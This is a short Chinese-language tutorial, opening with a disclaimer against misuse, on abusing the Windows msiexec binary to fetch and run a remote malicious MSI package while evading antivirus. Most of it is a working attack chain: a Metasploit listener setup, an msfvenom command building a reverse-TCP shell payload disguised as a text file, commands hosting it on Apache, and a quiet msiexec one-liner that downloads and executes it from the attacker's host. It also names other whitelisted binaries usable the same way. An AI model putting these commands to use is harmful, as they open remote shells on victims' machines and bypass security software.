声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
msiexec是非常重要的操作系统组件,通常用来安装Windows Installer安装包,而且msiexec支持远程加载msi程序功能,因此可以通过msiexec加载远程的恶意msi程序,实现免杀的效果。其它的白名单执行payload包括:Wmic、Mshta.exe、 Regsvr32、Regsvcs、Regasm、 Rundll32、PsExec、 Cmstp.exe等。
1
MSF监听设置
>> use exploit/multi/handler
>> set lhost 192.168.146.130
>> set lport 9998
>> set payload windows/x64/shell/reverse_tcp
>> exploit -j
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.146.130 LPORT=9998 -f msi > beta.txt
开启web服务,将beta.txt移动到web服务的根目录
>> sudo service apache2 start
>> sudo mv beta.txt /var/www/html/
2
msiexecXEC执行Payload
C:\Windows\System32\msiexec.exe /q /i http://192.168.146.130/beta.txt